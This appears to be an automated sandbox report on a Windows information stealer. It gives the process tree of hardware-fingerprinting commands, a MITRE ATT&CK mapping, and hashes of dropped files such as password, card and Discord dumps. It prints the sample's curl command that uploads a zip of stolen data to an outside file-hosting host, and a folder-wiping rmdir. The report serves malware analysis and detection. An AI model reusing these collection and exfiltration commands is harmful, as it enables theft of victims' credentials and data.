    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:2888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3004
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:4208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:3512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:1880
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4724
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3276
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1380
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2108
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4672
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3608
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3600
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2956
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:4748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Llxdhewc.zip";"
  2⤵
  PID:3280
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Llxdhewc.zip";
    3⤵
    PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1832
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3868
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4932
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1764
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2804
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
  2⤵
  PID:4188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2376
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1744
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:5116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4428
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2328
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2804
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4192
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2244
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1084
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1072

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4696

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3504

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-LLX~1\debug.log

Filesize
2KB

MD5
78d99a5d30c8a7ce36eea9c444de0230

SHA1
27479815cf337d9bb5da788846cbe3fa4037bbd1

SHA256
48397661f7642206e3b400021c0abe61e2c5b79827c6bd4eaf173656d887c73c

SHA512
0230fd613c7726fb8b34fa8fa64fad53f96539f0c5228eb00ca54b1428486263559051ca459cbd8ebd21502a1693f399dfc94c0beee423c6aada3324fadf93f3

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc.zip

Filesize
2KB

MD5
3ba36c26edecd2baa04da24a76ba1d36

SHA1
3b8527d8fbe55830f1666014dbb80ed14af27dd7

SHA256
1e0aaf77070753223f9c151f7c1e352136d523d9b9fcfabd9acb4964eff2e9ba

SHA512
8a28bf0666923048f174a203e9bc77a703a8723b8579f0223a0eb35e747f34da09156a487c50c3e40ba97545a863fd0ef05f8a66b146e565730898e272700c38

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Screenshots\Screenshot.png

Filesize
414KB

MD5
cb1ec048a529d6bb572162ea4eb9ed23

SHA1
c8795163452918e8b352dbdc391932470d48c433

SHA256
528bc4d1779537116ba879e65af1b55d3d46ab5c74028bc2328eefb09bf82ffc

SHA512
d56c5affe0b7db318b6211dab6e44eb418369b9f7ead649ea804018864abc8e42968f9b7a58f2a4c2e957feced32806c1b16d244771084e0b7e88c3f6fedd3a1

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\Serial-Check.txt

Filesize
506B

MD5
d87df83ad0e16b71c1daf3b225b5b537

SHA1
6147d24f06f5fe204914cf2c322997f9ffedcc5a

SHA256
66c7c96367f5bd68d7e3219ac9ffb058c3ab855632fd83294fdce76659c258b0

SHA512
298efeece30419db2b7aeb8a3c102d71ce2e94b7056e029c58e3fa13a9bf85ad1b49f74654289acdc3192309f3a4e1369fdf39e207a9758ea6c4690f13702161

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\debug.log

Filesize
1KB

MD5
efd341911760f423f91a537a021e2d9a

SHA1
3253130ce494feb26b3240fe5139bef710fae6cf

SHA256
960cefb7ef83164f8615b942839a497c4db573286eb35d10e862bd03192b576f

SHA512
99fa0169121ae6a1dbd1c04f7db13491cade940e221c02736528880557ec650adbac9bb5fb9b25bdff5d38835ba67083458b128ad3628e85984c03d474b6dba8

Download Submit
C:\ProgramData\Steam\Launcher\EN-Llxdhewc\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
93f90bda499e44e7497ed86627232b18

SHA1
711d3ed2e1d427dd6633ac3f1f258382694ac050

SHA256
e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2

SHA512
edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
edde8f0d1c2b354e54dfe40cc569eab0

SHA1
527e75e7d1bcbd62eddb32544e5f8e0a5a09296a

SHA256
0f34a5a9c6db0916597e6f822b6619350204fe2f1ff21a4e10c87098f33e5d41

SHA512
039f8707b428dee74545279c435975a07a2b4743819f67270188beb12cc9bce9233b0b3e81c4219ea31a530952f297a7bf63b9c61ba0950acbccab753db182fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5fcfa95543a7088c79ff4dd7ce6cd352

SHA1
5fc2045faf1c35ebf32907a4b8cf76874fd31f43

SHA256
e11655e31ad254ca1490f992e8044548acd1c0c19003bebfc8e41320e03aad8e

SHA512
b99a12c3c46a3b4e5cd5ba65c933fbbff35d567ea182c0b3902479605898e21f3c245f7f50736f1d16f8449d251b1bdaefe5b3cc060902095a22b27334e4b385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
21a2793edfd2da16b563462852bdf189

SHA1
b4e1e0a1e8d651fa3100eb2711dc1ee8c6255a82

SHA256
0bb3dfdda49214c4ffe6442378b78352c77f42b56cb7cf5d2c720e1f08f54e32

SHA512
08f78e90f793a9acf9827d3ab5329d4afeccd5abe5ad93c7476e30b5d32f374ade468a22d87e7440511084de5c479da0246e0f9e18883b8fe8f5ba41c909da1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8fe70e63c44ca0ecd48b0180321927d3

SHA1
1419bf270210e065da1a4a36ef0d7f88ca89ee04

SHA256
f748e385e9b3b1eed95616ddc565f705187c5a9f5cc6a5e5ac132e43eb681eb2

SHA512
